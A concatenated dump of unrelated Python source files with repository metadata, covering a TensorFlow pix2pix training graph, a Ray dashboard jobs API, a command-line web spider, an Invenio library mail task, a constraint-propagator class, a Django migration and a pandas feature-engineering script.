== GraphMode.PREDICT: return self._build_predict_graph() logger = get_logger() logger.debug('batch_size: %s', batch_size) tensors = GraphReferences() tensors.is_training = tf.constant(graph_mode == GraphMode.TRAIN) is_training = ( graph_mode == GraphMode.TRAIN or graph_mode == GraphMode.EVALUATE ) if not data_paths: raise ValueError('data_paths required') get_logger().info('reading examples from %s', data_paths) tensors.examples = read_examples( get_matching_files(data_paths), shuffle=(graph_mode == GraphMode.TRAIN), num_epochs=None if is_training else 2, page_range=self.args.pages, channel_colors=( self.dimension_colors if self.args.filter_annotated else None ) ) parsed = tensors.examples tensors.image_tensors = {} tensors.input_uri = tf.squeeze(parsed['input_uri']) tensors.annotation_uri = tf.squeeze(parsed['annotation_uri']) raw_input_image = tf.squeeze(parsed['input_image']) logging.info('raw_input_image: %s', raw_input_image) raw_annotation_image = tf.squeeze(parsed['annotation_image']) tensors.image_tensor = tf.image.decode_png(raw_input_image, channels=3) tensors.annotation_tensor = tf.image.decode_png(raw_annotation_image, channels=3) # TODO resize_images and tf.cast did not work on input image # but did work on annotation image tensors.image_tensor = tf.image.resize_image_with_crop_or_pad( tensors.image_tensor, self.image_height, self.image_width ) tensors.image_tensor = tf.image.convert_image_dtype(tensors.image_tensor, tf.float32) tensors.annotation_tensor = tf.image.resize_image_with_crop_or_pad( tensors.annotation_tensor, self.image_height, self.image_width ) if self.use_separate_channels: with tf.variable_scope('channels'): color_masks = calculate_color_masks( tensors.annotation_tensor, self.dimension_colors, use_unknown_class=self.use_unknown_class ) tensors.separate_channel_annotation_tensor = tf.stack(color_masks, axis=-1) if self.args.base_loss == BaseLoss.SAMPLE_WEIGHTED_CROSS_ENTROPY: with tf.variable_scope('class_weights'): tensors.pos_weight = _create_pos_weights_tensor( base_loss=self.args.base_loss, separate_channel_annotation_tensor=( tensors.separate_channel_annotation_tensor ), pos_weight_values=self.pos_weight, input_uri=tensors.input_uri, debug=self.args.debug ) else: tensors.annotation_tensor = tf.image.convert_image_dtype( tensors.annotation_tensor, tf.float32 ) tensors.separate_channel_annotation_tensor = tensors.annotation_tensor batched_tensors: dict = tf.train.batch( remove_none_from_dict({ k: getattr(tensors, k) for k in [ 'input_uri', 'annotation_uri', 'image_tensor', 'annotation_tensor', 'separate_channel_annotation_tensor', 'pos_weight' ] }), batch_size=batch_size ) for k, v in batched_tensors.items(): setattr(tensors, k, v) if tensors.pos_weight is None: tensors.pos_weight = self.pos_weight pix2pix_model = create_pix2pix_model( tensors.image_tensor, tensors.separate_channel_annotation_tensor, self.args, is_training=tensors.is_training, pos_weight=tensors.pos_weight ) if self.use_separate_channels: with tf.name_scope("evaluation"): tensors.output_layer_labels = tf.constant(self.dimension_labels_with_unknown) evaluation_result = evaluate_separate_channels( targets=pix2pix_model.targets, outputs=pix2pix_model.outputs ) tensors.evaluation_result = evaluation_result evaluation_summary(evaluation_result, self.dimension_labels_with_unknown) else: with tf.name_scope('evaluation'): if self.dimension_colors: tensors.output_layer_labels = tf.constant(self.dimension_labels) colors_tensor = tf.constant( self.dimension_colors_with_unknown, dtype=tf.float32 ) / 255.0 tensors.outputs_class_indices = find_nearest_centroid_indices( predictions=pix2pix_model.outputs, centroids=colors_tensor ) tensors.targets_class_indices = find_nearest_centroid_indices( predictions=pix2pix_model.targets, centroids=colors_tensor ) evaluation_result = evaluate_predictions( labels=tensors.targets_class_indices, predictions=tensors.outputs_class_indices, n_classes=len(self.dimension_colors_with_unknown) ) tensors.evaluation_result = evaluation_result evaluation_summary(evaluation_result, self.dimension_labels) tensors.global_step = pix2pix_model.global_step tensors.train = pix2pix_model.train tensors.class_labels_tensor = tensors.annotation_tensor tensors.pred = pix2pix_model.outputs tensors.probabilities = pix2pix_model.outputs tensors.metric_values = [pix2pix_model.discrim_loss] add_model_summary_images( tensors, self.dimension_colors, self.dimension_labels, use_separate_channels=self.use_separate_channels, has_unknown_class=self.use_unknown_class ) # tensors.summaries = create_summaries(pix2pix_model) create_other_summaries(pix2pix_model) if ( self.args.base_loss == BaseLoss.SAMPLE_WEIGHTED_CROSS_ENTROPY and tensors.pos_weight is not None ): with tf.variable_scope('pos_weight_summary'): tf.summary.text('pos_weight', tf.as_string(tf.reshape( tensors.pos_weight, [-1, int(tensors.pos_weight.shape[-1])] ))) tensors.summary = tf.summary.merge_all() return tensors def build_train_graph(self, data_paths, batch_size): return self.build_graph(data_paths, batch_size, GraphMode.TRAIN) def build_eval_graph(self, data_paths, batch_size): return self.build_graph(data_paths, batch_size, GraphMode.EVALUATE) def build_predict_graph(self): return self.build_graph(None, None, GraphMode.PREDICT) def initialize(self, session): pass def format_metric_values(self, metric_values): """Formats metric values - used for logging purpose.""" # Early in training, metric_values may actually be None. loss_str = 'N/A' accuracy_str = 'N/A' try: loss_str = '%.3f' % metric_values[0] accuracy_str = '%.3f' % metric_values[1] except (TypeError, IndexError): pass return '%s, %s' % (loss_str, accuracy_str) def str_to_bool(s): return s.lower() in ('yes', 'true', '1') def str_to_list(s): s = s.strip() if not s: return [] return [x.strip() for x in s.split(',')] def model_args_parser(): parser = argparse.ArgumentParser() parser.add_argument( "--ngf", type=int, default=64, help="number of generator filters in first conv layer" ) parser.add_argument( "--ndf", type=int, default=64, help="number of discriminator filters in first conv layer" ) parser.add_argument( "--lr", type=float, default=0.0002, help="initial learning rate for adam" ) parser.add_argument( "--beta1", type=float, default=0.5, help="momentum term of adam" ) parser.add_argument( "--l1_weight", type=float, default=100.0, help="weight on L1 term for generator gradient" ) parser.add_argument( "--gan_weight", type=float, default=1.0, help="weight on GAN term for generator gradient" ) parser.add_argument( '--pages', type=parse_page_range, default=None, help='only processes the selected pages' ) parser.add_argument( '--color_map', type=str, help='The path to the color map configuration.' ) parser.add_argument( '--class_weights', type=str, help='The path to the class weights configuration.' ) parser.add_argument( '--channels', type=str_to_list, help='The channels to use (subset of color map), otherwise all of the labels will be used' ) parser.add_argument( '--filter_annotated', type=str_to_bool, default=False, help='Only include pages that have annotations for the selected channels' ' (if color map is provided)' ) parser.add_argument( '--use_unknown_class', type=str_to_bool, default=True, help='Use unknown class channel (if color map is provided)' ) parser.add_argument( '--use_separate_channels', type=str_to_bool, default=False, help='The separate output channels per annotation (if color map is provided)' ) parser.add_argument( '--use_separate_discriminator_channels', type=str_to_bool, default=False, help='The separate discriminator channels per annotation (if color map is provided)' ) parser.add_argument( '--use_separate_discriminators', type=str_to_bool, default=False, help='The separate discriminators per annotation (if color map is provided)' ) parser.add_argument( '--base_loss', type=str, default=BaseLoss.L1, choices=ALL_BASE_LOSS, help='The base loss function to use' ) parser.add_argument( '--debug', type=str_to_bool, default=True, help='Enable debug mode' ) return parser def create_model(argv=None): """Factory method that creates model to be used by generic task.py.""" parser = model_args_parser() args, task_args = parser.parse_known_args(argv) return Model(args), task_args
21,544
697
556
a59878ebd625530edf2818a79e847570d7a43bc3
3,985
py
Python
dashboard/modules/job/job_head.py
sungho-joo/ray
7a18d90a2527ba603f3e0444346389c3136bf50e
[ "Apache-2.0" ]
null
null
null
dashboard/modules/job/job_head.py
sungho-joo/ray
7a18d90a2527ba603f3e0444346389c3136bf50e
[ "Apache-2.0" ]
30
2021-11-05T06:54:54.000Z
2022-03-19T07:10:33.000Z
dashboard/modules/job/job_head.py
RuofanKong/ray
60e9737679d93e7e8902dcea0720addb506ddf0a
[ "Apache-2.0" ]
null
null
null
import aiohttp.web from functools import wraps import logging from typing import Callable import json import dataclasses import ray import ray.dashboard.utils as dashboard_utils from ray._private.job_manager import JobManager from ray._private.runtime_env.packaging import (package_exists, upload_package_to_gcs) from ray.dashboard.modules.job.data_types import ( GetPackageResponse, JobStatus, JobSubmitRequest, JobSubmitResponse, JobStatusResponse, JobLogsResponse) logger = logging.getLogger(__name__) routes = dashboard_utils.ClassMethodRouteTable RAY_INTERNAL_JOBS_NAMESPACE = "_ray_internal_jobs_" JOBS_API_PREFIX = "/api/jobs/" JOBS_API_ROUTE_LOGS = JOBS_API_PREFIX + "logs" JOBS_API_ROUTE_SUBMIT = JOBS_API_PREFIX + "submit" JOBS_API_ROUTE_STATUS = JOBS_API_PREFIX + "status" JOBS_API_ROUTE_PACKAGE = JOBS_API_PREFIX + "package"
36.898148
77
0.697867
import aiohttp.web from functools import wraps import logging from typing import Callable import json import dataclasses import ray import ray.dashboard.utils as dashboard_utils from ray._private.job_manager import JobManager from ray._private.runtime_env.packaging import (package_exists, upload_package_to_gcs) from ray.dashboard.modules.job.data_types import ( GetPackageResponse, JobStatus, JobSubmitRequest, JobSubmitResponse, JobStatusResponse, JobLogsResponse) logger = logging.getLogger(__name__) routes = dashboard_utils.ClassMethodRouteTable RAY_INTERNAL_JOBS_NAMESPACE = "_ray_internal_jobs_" JOBS_API_PREFIX = "/api/jobs/" JOBS_API_ROUTE_LOGS = JOBS_API_PREFIX + "logs" JOBS_API_ROUTE_SUBMIT = JOBS_API_PREFIX + "submit" JOBS_API_ROUTE_STATUS = JOBS_API_PREFIX + "status" JOBS_API_ROUTE_PACKAGE = JOBS_API_PREFIX + "package" def _ensure_ray_initialized(f: Callable) -> Callable: @wraps(f) def check(self, *args, **kwargs): if not ray.is_initialized(): ray.init(address="auto", namespace=RAY_INTERNAL_JOBS_NAMESPACE) return f(self, *args, **kwargs) return check class JobHead(dashboard_utils.DashboardHeadModule): def __init__(self, dashboard_head): super().__init__(dashboard_head) self._job_manager = None @routes.get(JOBS_API_ROUTE_PACKAGE) @_ensure_ray_initialized async def get_package(self, req: aiohttp.web.Request) -> aiohttp.web.Response: package_uri = req.query["package_uri"] resp = GetPackageResponse(package_exists=package_exists(package_uri)) return aiohttp.web.Response( text=json.dumps(dataclasses.asdict(resp)), content_type="application/json") @routes.put(JOBS_API_ROUTE_PACKAGE) @_ensure_ray_initialized async def upload_package(self, req: aiohttp.web.Request): package_uri = req.query["package_uri"] logger.info(f"Uploading package {package_uri} to the GCS.") upload_package_to_gcs(package_uri, await req.read()) return aiohttp.web.Response() @routes.post(JOBS_API_ROUTE_SUBMIT) @_ensure_ray_initialized async def submit(self, req: aiohttp.web.Request) -> aiohttp.web.Response: # TODO: (jiaodong) Validate if job request is valid without using # pydantic. submit_request = JobSubmitRequest(**(await req.json())) job_id = self._job_manager.submit_job( entrypoint=submit_request.entrypoint, runtime_env=submit_request.runtime_env, metadata=submit_request.metadata) resp = JobSubmitResponse(job_id=job_id) return aiohttp.web.Response( text=json.dumps(dataclasses.asdict(resp)), content_type="application/json") @routes.get(JOBS_API_ROUTE_STATUS) @_ensure_ray_initialized async def status(self, req: aiohttp.web.Request) -> aiohttp.web.Response: job_id = req.query["job_id"] status: JobStatus = self._job_manager.get_job_status(job_id) resp = JobStatusResponse(job_status=status) return aiohttp.web.Response( text=json.dumps(dataclasses.asdict(resp)), content_type="application/json") @routes.get(JOBS_API_ROUTE_LOGS) @_ensure_ray_initialized async def logs(self, req: aiohttp.web.Request) -> aiohttp.web.Response: job_id = req.query["job_id"] stdout: bytes = self._job_manager.get_job_stdout(job_id) stderr: bytes = self._job_manager.get_job_stderr(job_id) # TODO(jiaodong): Support log streaming #19415 resp = JobLogsResponse( stdout=stdout.decode("utf-8"), stderr=stderr.decode("utf-8")) return aiohttp.web.Response( text=json.dumps(dataclasses.asdict(resp)), content_type="application/json") async def run(self, server): if not self._job_manager: self._job_manager = JobManager()
2,481
559
46
c24074ac9a3cdf8728bde947483d6f521b704136
7,589
py
Python
minispider/__main__.py
leepxrk/scrapy_learn
7c0aea1c1e312aa16d11926f2421ed00aa92d97f
[ "MIT" ]
null
null
null
minispider/__main__.py
leepxrk/scrapy_learn
7c0aea1c1e312aa16d11926f2421ed00aa92d97f
[ "MIT" ]
null
null
null
minispider/__main__.py
leepxrk/scrapy_learn
7c0aea1c1e312aa16d11926f2421ed00aa92d97f
[ "MIT" ]
null
null
null
#!/usr/bin/env python import argparse from .sql import MiniSpiderSQL from .scheduler import MiniSpider from .extractor import Extractor from .downloader import MiniSpiderDownloader __version__ = '0.0.3' if __name__ == '__main__': main()
35.966825
112
0.58598
#!/usr/bin/env python import argparse from .sql import MiniSpiderSQL from .scheduler import MiniSpider from .extractor import Extractor from .downloader import MiniSpiderDownloader __version__ = '0.0.3' def main(): # Make parser for terminal. description = 'MiniSpider makes it easy to create user-friendly spider.' usage = 'mini-spider [OPTION]... [URL]...' parser = argparse.ArgumentParser(prog='MiniSpider', description=description, usage=usage, epilog='Powered by ZYunH. Version:%s' % __version__) # Add arguments. analysis_help = 'Analysis a URL.' parser.add_argument('-a', help=analysis_help, nargs='+', dest='analysis_url', metavar='[URL]') similarity_threshold_help = 'Set similarity_threshold,default = 0.6' parser.add_argument('-st', help=similarity_threshold_help, nargs=1, dest='similarity', type=float, metavar='[float]') choose_help = 'Choose block make extractor.' parser.add_argument('-c', help=choose_help, nargs='+', dest='choose_block', type=int, metavar='[num]') timeout_help = 'Set timeout.(default: 2)' parser.add_argument('-time', help=timeout_help, nargs=1, dest='time_out', type=float, metavar='[float]') to_help = 'Choose match data.(default: u)' parser.add_argument('-to', help=to_help, nargs='?', dest='to', const='u', choices=['u', 'r']) name_help = 'Name your extractor.it can be ignored.' parser.add_argument('-n', help=name_help, nargs=1, dest='name', metavar='[name]') start_help = 'Start spider to get url and resource.' parser.add_argument('-start', help=start_help, nargs='?', dest='start', const=True, metavar='URL') download_help = 'Download all url from database.' parser.add_argument('-download', help=download_help, nargs='?', dest='download', const=True, metavar='Path') make_help = 'Make extractor by user.' parser.add_argument('-m', help=make_help, nargs='+', dest='make', metavar='[RE]') export_help = 'Export url from database.' parser.add_argument('-export', help=export_help, nargs=1, dest='export_url', metavar='[FileName]') import_help = 'Import url into database.' parser.add_argument('-import', help=import_help, nargs=1, dest='import_url', metavar='[FileName]') list_help = 'List url in url_list or resource.options: "u" or "r"' parser.add_argument('-list', help=list_help, nargs='+', dest='list_url', metavar='') false_help = 'Disable classification function in -download.' parser.add_argument('-false', help=false_help, nargs='?', dest='false_set', const=True, metavar='') reset_help = 'Reset database stats = 1.(default: u)' parser.add_argument('-reset', help=reset_help, nargs='?', dest='reset', const='u', choices=['u', 'r']) # Parse arguments. args = parser.parse_args() # Parse analysis url. if args.analysis_url: if len(args.analysis_url) == 1: print('Error: Please input what resource you are looking for!') return False timeout = 2.0 if args.time_out: timeout = args.time_out[0] if args.similarity: spider = MiniSpider(args.analysis_url[0], search=args.analysis_url[1:], similarity_threshold=args.similarity[0], timeout=timeout) spider.analysis_url() else: spider = MiniSpider(args.analysis_url[0], search=args.analysis_url[1:], similarity_threshold=0.6, timeout=timeout) spider.analysis_url() # Choose block make regular expression. elif args.choose_block: num = args.choose_block[0] start = None end = None if len(args.choose_block) == 2: start = args.choose_block[1] elif len(args.choose_block) == 3: start = args.choose_block[1] end = args.choose_block[2] pattern = MiniSpider().choose_block(num, start, end) # Print pattern. if len(pattern) == 2: print('Host:' + pattern[1]) print(pattern[0]) else: print(pattern) # Choose database. if args.to: name = None if args.name: name = args.name[0] if args.to[0] == 'u': Extractor().make_extractor(name, pattern=pattern, mode='url') elif args.to[0] == 'r': Extractor().make_extractor(name, pattern=pattern, mode='resource') print('The extractor was created successfully!') else: print("Error: Please input '-to u' or '-to r'") return False # Make pattern by user. elif args.make: pattern_user = args.make[0] # Get host, if possible. if len(args.make) == 2: pattern_user = pattern_user, args.make[1] # Choose database. if args.to: name = None if args.name: name = args.name[0] if args.to[0] == 'u': Extractor().make_extractor(name, pattern=pattern_user, mode='url') elif args.to[0] == 'r': Extractor().make_extractor(name, pattern=pattern_user, mode='resource') print('The extractor was created successfully!') else: print("Error: Please input '-to u' or '-to r'") return False # Start project. elif args.start: if args.start is True: MiniSpider().start() else: MiniSpider().start(args.start) # Start downloading. elif args.download: classify = True timeout = 2.0 if args.false_set: classify = False if args.time_out: timeout = args.time_out[0] if args.download is True: MiniSpiderDownloader().start(classify=classify, timeout=timeout) else: MiniSpiderDownloader().start(args.download, classify=classify, timeout=timeout) # Import txt. elif args.import_url: # Choose database. if args.to: if args.to[0] == 'u': MiniSpiderSQL().import_txt(args.import_url[0], 'url_list') elif args.to[0] == 'r': MiniSpiderSQL().import_txt(args.import_url[0], 'resource') print('Import success!') else: print("Error: Please input '-to u' or '-to r'") return False # Export txt. elif args.export_url: # Choose database. if args.to: if args.to[0] == 'u': MiniSpiderSQL().export_txt(args.export_url[0], 'url_list') elif args.to[0] == 'r': MiniSpiderSQL().export_txt(args.export_url[0], 'resource') print('Export success!') else: print("Error: Please input '-to u' or '-to r'") return False # List database. elif args.list_url: num = 50 if len(args.list_url) == 2: num = int(args.list_url[1]) if args.list_url[0] == 'u': MiniSpiderSQL().list_url(table_name='url_list', num=num) elif args.list_url[0] == 'r': MiniSpiderSQL().list_url(table_name='resource', num=num) else: print("Error: Please input '-list u' or '-list r'") return False # print(parser.print_help()) # Reset database stats. elif args.reset: MiniSpiderSQL().reset(args.reset[0]) else: parser.print_help() if __name__ == '__main__': main()
7,324
0
23
cecda11e8240a03768dc24d5ae13e7860657aad1
1,345
py
Python
invenio_app_ils/ill/mail/tasks.py
masonproffitt/invenio-app-ils
81dd12aa774d7d70096de77cc526d9b4ca614437
[ "MIT" ]
null
null
null
invenio_app_ils/ill/mail/tasks.py
masonproffitt/invenio-app-ils
81dd12aa774d7d70096de77cc526d9b4ca614437
[ "MIT" ]
null
null
null
invenio_app_ils/ill/mail/tasks.py
masonproffitt/invenio-app-ils
81dd12aa774d7d70096de77cc526d9b4ca614437
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (C) 2020 CERN. # # invenio-app-ils is free software; you can redistribute it and/or modify it # under the terms of the MIT License; see LICENSE file for more details. """ILL mail tasks.""" from invenio_app_ils.ill.errors import ILLError from invenio_app_ils.ill.mail.factory import ill_message_creator_factory from invenio_app_ils.mail.messages import get_common_message_ctx from invenio_app_ils.mail.tasks import send_ils_email def send_ill_mail(brw_req, action=None, message_ctx={}, **kwargs): """Send an ILL email. :param brw_req: the borrowing request record. :param action: the action performed, if any. :param message_ctx: any other parameter to be passed as ctx in the msg. """ creator = ill_message_creator_factory() message_ctx.update(get_common_message_ctx(record=brw_req)) try: # fetch and inject in the email template the patron loan if available loan = brw_req.patron_loan.get() message_ctx["patron_loan"] = loan except ILLError: # no loan in the borrowin request message_ctx["patron_loan"] = dict() patron = message_ctx["patron"] msg = creator( brw_req, action=action, message_ctx=message_ctx, recipients=[patron.email], **kwargs, ) send_ils_email(msg)
30.568182
77
0.700372
# -*- coding: utf-8 -*- # # Copyright (C) 2020 CERN. # # invenio-app-ils is free software; you can redistribute it and/or modify it # under the terms of the MIT License; see LICENSE file for more details. """ILL mail tasks.""" from invenio_app_ils.ill.errors import ILLError from invenio_app_ils.ill.mail.factory import ill_message_creator_factory from invenio_app_ils.mail.messages import get_common_message_ctx from invenio_app_ils.mail.tasks import send_ils_email def send_ill_mail(brw_req, action=None, message_ctx={}, **kwargs): """Send an ILL email. :param brw_req: the borrowing request record. :param action: the action performed, if any. :param message_ctx: any other parameter to be passed as ctx in the msg. """ creator = ill_message_creator_factory() message_ctx.update(get_common_message_ctx(record=brw_req)) try: # fetch and inject in the email template the patron loan if available loan = brw_req.patron_loan.get() message_ctx["patron_loan"] = loan except ILLError: # no loan in the borrowin request message_ctx["patron_loan"] = dict() patron = message_ctx["patron"] msg = creator( brw_req, action=action, message_ctx=message_ctx, recipients=[patron.email], **kwargs, ) send_ils_email(msg)
0
0
0
e490594eb909224b9de0516fb7d5021a6e745b8b
980
py
Python
csp/propagators/propagator.py
abeccaro/csp-solver
a761dee02a4dd12162eb55ef34cc0989c79567cc
[ "MIT" ]
null
null
null
csp/propagators/propagator.py
abeccaro/csp-solver
a761dee02a4dd12162eb55ef34cc0989c79567cc
[ "MIT" ]
null
null
null
csp/propagators/propagator.py
abeccaro/csp-solver
a761dee02a4dd12162eb55ef34cc0989c79567cc
[ "MIT" ]
null
null
null
from abc import abstractmethod from csp.observer import Observer class Propagator(Observer): """Abstract class for a constraint propagator.""" @abstractmethod def on_domain_change(self, var): """Called when a variable domain has changed. :param var: The variable that changed :type var: Variable """ pass def setup(self, problem): """Called to initialize this propagator with problem data :param problem: The csp :type problem: Problem """ for v in problem.variables: v.add_observer(self) self.map[v] = [] for c in problem.constraints: for v in c.get_vars(): self.map[v].append(c)
24.5
66
0.544898
from abc import abstractmethod from csp.observer import Observer class Propagator(Observer): """Abstract class for a constraint propagator.""" def __init__(self): super().__init__() self.enabled = True self.map = {} def on_event(self, var): self.on_domain_change(var) @abstractmethod def on_domain_change(self, var): """Called when a variable domain has changed. :param var: The variable that changed :type var: Variable """ pass def setup(self, problem): """Called to initialize this propagator with problem data :param problem: The csp :type problem: Problem """ for v in problem.variables: v.add_observer(self) self.map[v] = [] for c in problem.constraints: for v in c.get_vars(): self.map[v].append(c)
117
0
66
6fec7946842257e2587af351dffd6c086fd072c2
413
py
Python
publications/migrations/0025_publication_is_from_systematic_search.py
gormshackelford/metadataset
ab8a1c0c70a508da37b3a64906ba85c69dd74b6b
[ "MIT" ]
2
2019-12-18T12:00:02.000Z
2020-03-11T01:15:45.000Z
publications/migrations/0025_publication_is_from_systematic_search.py
gormshackelford/metadataset
ab8a1c0c70a508da37b3a64906ba85c69dd74b6b
[ "MIT" ]
2
2020-06-06T00:01:13.000Z
2021-06-10T22:09:30.000Z
publications/migrations/0025_publication_is_from_systematic_search.py
gormshackelford/metadataset
ab8a1c0c70a508da37b3a64906ba85c69dd74b6b
[ "MIT" ]
1
2020-01-07T12:28:43.000Z
2020-01-07T12:28:43.000Z
# Generated by Django 2.0 on 2019-04-02 09:57 from django.db import migrations, models
21.736842
52
0.627119
# Generated by Django 2.0 on 2019-04-02 09:57 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('publications', '0024_auto_20190401_1522'), ] operations = [ migrations.AddField( model_name='publication', name='is_from_systematic_search', field=models.BooleanField(default=True), ), ]
0
301
23
8c62f4298524bab607b4dbc094a650eb75802544
2,046
py
Python
spider_package/config.py
hjjia/spider
ae52414b608487523e235d69b6404d9d0c06a931
[ "MIT" ]
null
null
null
spider_package/config.py
hjjia/spider
ae52414b608487523e235d69b6404d9d0c06a931
[ "MIT" ]
null
null
null
spider_package/config.py
hjjia/spider
ae52414b608487523e235d69b6404d9d0c06a931
[ "MIT" ]
null
null
null
# coding:utf8 import re options = { 'root_url': 'http://www.juooo.com', 'max_count': 1000, 'urlReg': { 'urlRegType': 1, 'urlFull': '', 'urlStr': 'http://(\w+).juooo.com/\w+' }, 'urlData': [] }
26.230769
75
0.529326
# coding:utf8 import re options = { 'root_url': 'http://www.juooo.com', 'max_count': 1000, 'urlReg': { 'urlRegType': 1, 'urlFull': '', 'urlStr': 'http://(\w+).juooo.com/\w+' }, 'urlData': [] } def initOptions(): print '请输入入口url:' root_url = raw_input('入口url:') if root_url: print 'aaa' options['root_url'] = root_url print '=====================================' print '请输入最大收集条数,大于0的正整数, 0默认收集%d条' % options['max_count'] max_count = raw_input('最大收集条数:') if max_count and int(max_count) > 1: options['max_count'] = int(max_count) print '\n' print '=================================' print '请输入需要收集的url格式' print '1. 完整url格式, 默认模式' print '2. 域名+部分url格式' urlType = raw_input('请选择url格式:') print urlType urlStr = '' urlFull = '' urlRe = r'^http(s?)://(\w+.+)\w' if urlType and int(urlType) == 2: urlFull = raw_input('请输入带完整域名的urlFull:') urlTest = re.match(urlRe, urlFull) if not (urlTest) is None: options['urlReg']['urlFull'] = urlFull urlStr = raw_input('请输入需要查找的urlStr:') options['urlReg']['urlStr'] = urlStr options['urlReg']['urlRegType'] = int(urlType) elif urlType and int(urlType) == 1 : while True: urlStr = raw_input('请输入带完整域名的urlStr:') urlTest = re.match(urlRe, urlStr) if not (urlTest) is None: options['urlReg']['urlStr'] = urlStr options['urlReg']['urlRegType'] = int(urlType) break # 输入需要配置的数据项 print '请输入配置项,每一个配置项标签名和class名' num = 1 while True: itemTag = raw_input('请输入数据项' + num +'的标签名 ') itemClass = raw_input('请输入数据项' + num +'的class ') options.urlData[num].itemTag = itemTag options.urlData[num].itemName = itemClass if (not (itemTag) is None or not (itemClass) is None) and num != 1: break num = num + 1 return options
2,055
0
23
033ec08de916e40e952cee70655dddeca4bcde74
31,594
py
Python
code/src/features.py
bsm8734/BC_stage2_Tabular_data_Classification
e421360f3f6f9016c58bfff2dd20485206e4a365
[ "MIT" ]
null
null
null
code/src/features.py
bsm8734/BC_stage2_Tabular_data_Classification
e421360f3f6f9016c58bfff2dd20485206e4a365
[ "MIT" ]
null
null
null
code/src/features.py
bsm8734/BC_stage2_Tabular_data_Classification
e421360f3f6f9016c58bfff2dd20485206e4a365
[ "MIT" ]
null
null
null
import pandas as pd import numpy as np import os, sys, gc, random import datetime import dateutil.relativedelta # Machine learning from sklearn.preprocessing import LabelEncoder from sklearn.impute import SimpleImputer from sklearn.model_selection import StratifiedKFold from sklearn.metrics import roc_auc_score # Custom library from utils import seed_everything, print_score TOTAL_THRES = 300 # 구매액 임계값 SEED = 42 # 랜덤 시드 seed_everything(SEED) # 시드 고정 data_dir = '../input/train.csv' # os.environ['SM_CHANNEL_TRAIN'] model_dir = '../model' # os.environ['SM_MODEL_DIR'] ''' 입력인자로 받는 year_month에 대해 고객 ID별로 총 구매액이 구매액 임계값을 넘는지 여부의 binary label을 생성하는 함수 ''' # def get_year_month_list(df, year_month): # df = df.copy() # # df['year_month-mode'] = df['order_date'].dt.strftime('%Y-%m') # dd = df.groupby(['year_month-mode', 'customer_id'])['total'].sum() # cust_ids = df['customer_id'].unique() # # # year_month 이전 월 계산 # bef_12_d = datetime.datetime.strptime(year_month, "%Y-%m") # bef_12_prev_ym = bef_12_d - dateutil.relativedelta.relativedelta(months=12) # bef_12_prev_ym = bef_12_prev_ym.strftime('%Y-%m') # # # ddt = df[df['year_month-mode'] == bef_12_prev_ym] # # first_bef = [] # for id in cust_ids: # dd[:, bef_12_prev_ym] # # first_bef.append(dd.xs((id, bef_12_prev_ym))) # # # df['cycle_month'] = pd.Series(first_bef) # # print(df) if __name__ == '__main__': print('data_dir', data_dir)
40.298469
161
0.620877
import pandas as pd import numpy as np import os, sys, gc, random import datetime import dateutil.relativedelta # Machine learning from sklearn.preprocessing import LabelEncoder from sklearn.impute import SimpleImputer from sklearn.model_selection import StratifiedKFold from sklearn.metrics import roc_auc_score # Custom library from utils import seed_everything, print_score TOTAL_THRES = 300 # 구매액 임계값 SEED = 42 # 랜덤 시드 seed_everything(SEED) # 시드 고정 data_dir = '../input/train.csv' # os.environ['SM_CHANNEL_TRAIN'] model_dir = '../model' # os.environ['SM_MODEL_DIR'] ''' 입력인자로 받는 year_month에 대해 고객 ID별로 총 구매액이 구매액 임계값을 넘는지 여부의 binary label을 생성하는 함수 ''' def generate_label(df, year_month, total_thres=TOTAL_THRES, print_log=False): df = df.copy() # year_month에 해당하는 label 데이터 생성 df['year_month'] = df['order_date'].dt.strftime('%Y-%m') df.reset_index(drop=True, inplace=True) # year_month 이전 월의 고객 ID 추출 cust = df[df['year_month']<year_month]['customer_id'].unique() # year_month에 해당하는 데이터 선택 df = df[df['year_month']==year_month] # label 데이터프레임 생성 label = pd.DataFrame({'customer_id':cust}) label['year_month'] = year_month # year_month에 해당하는 고객 ID의 구매액의 합 계산 grped = df.groupby(['customer_id','year_month'], as_index=False)[['total']].sum() # label 데이터프레임과 merge하고 구매액 임계값을 넘었는지 여부로 label 생성 label = label.merge(grped, on=['customer_id','year_month'], how='left') label['total'].fillna(0.0, inplace=True) label['label'] = (label['total'] > total_thres).astype(int) # 고객 ID로 정렬 label = label.sort_values('customer_id').reset_index(drop=True) if print_log: print(f'{year_month} - final label shape: {label.shape}') return label def feature_preprocessing(train, test, features, do_imputing=True): x_tr = train.copy() x_te = test.copy() # 범주형 피처 이름을 저장할 변수 cate_cols = [] # 레이블 인코딩 for f in features: if x_tr[f].dtype.name == 'object': # 데이터 타입이 object(str)이면 레이블 인코딩 cate_cols.append(f) le = LabelEncoder() # train + test 데이터를 합쳐서 레이블 인코딩 함수에 fit le.fit(list(x_tr[f].values) + list(x_te[f].values)) # train 데이터 레이블 인코딩 변환 수행 x_tr[f] = le.transform(list(x_tr[f].values)) # test 데이터 레이블 인코딩 변환 수행 x_te[f] = le.transform(list(x_te[f].values)) print('categorical feature:', cate_cols) if do_imputing: # 중위값으로 결측치 채우기 imputer = SimpleImputer(strategy='median') x_tr[features] = imputer.fit_transform(x_tr[features]) x_te[features] = imputer.transform(x_te[features]) return x_tr, x_te def feature_engineering(df, year_month): df = df.copy() # year_month 이전 월 계산 d = datetime.datetime.strptime(year_month, "%Y-%m") prev_ym = d - dateutil.relativedelta.relativedelta(months=1) prev_ym = prev_ym.strftime('%Y-%m') # train, test 데이터 선택 train = df[df['order_date'] < prev_ym] test = df[df['order_date'] < year_month] # train, test 레이블 데이터 생성 train_label = generate_label(df, prev_ym)[['customer_id','year_month','label']] test_label = generate_label(df, year_month)[['customer_id','year_month','label']] # group by aggregation 함수 선언 agg_func = ['mean','max','min','sum','count','std','skew'] all_train_data = pd.DataFrame() for i, tr_ym in enumerate(train_label['year_month'].unique()): # group by aggretation 함수로 train 데이터 피처 생성 train_agg = train.loc[train['order_date'] < tr_ym].groupby(['customer_id']).agg(agg_func) # 멀티 레벨 컬럼을 사용하기 쉽게 1 레벨 컬럼명으로 변경 new_cols = [] for col in train_agg.columns.levels[0]: for stat in train_agg.columns.levels[1]: new_cols.append(f'{col}-{stat}') train_agg.columns = new_cols train_agg.reset_index(inplace = True) train_agg['year_month'] = tr_ym all_train_data = all_train_data.append(train_agg) all_train_data = train_label.merge(all_train_data, on=['customer_id', 'year_month'], how='left') features = all_train_data.drop(columns=['customer_id', 'label', 'year_month']).columns # group by aggretation 함수로 test 데이터 